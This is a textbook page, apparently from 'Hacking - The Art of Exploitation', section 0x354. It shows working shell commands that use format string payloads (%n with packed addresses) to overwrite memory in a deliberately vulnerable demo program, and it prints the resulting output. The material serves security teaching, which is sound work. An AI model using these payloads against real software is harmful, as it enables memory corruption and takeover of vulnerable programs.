Hacking - The Art of Exploitation, 2nd Edition

Exploitation 173

0x354 Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n to write to an arbitrary memory address. Now things are getting interesting. The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test variable is located at 0x08049794, so by using a similar technique, you should be able to write to the variable.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/
usr/games
[] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
??%08x.%08x.%08x.%n
??bffff3d0.b7fe75fc.00000000.
[] test_val @ 0x08049794 = 31 0x0000001f
reader@hacking:~/booksrc $

As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
??%x%x%x%n
??bffff3d0b7fe75fc0
[] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n
??%x%x%100x%n
??bffff3d0b7fe75fc
0
[] test_val @ 0x08049794 = 120 0x00000078
??%x%x%180x%n
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 200 0x000000c8
??%x%x%400x%n

Hacking - The Art of Exploitation, 2nd Edition

0x354 Writing to Arbitrary Memory Addresses

Get our desktop app

Company

Features

Documentation

Resources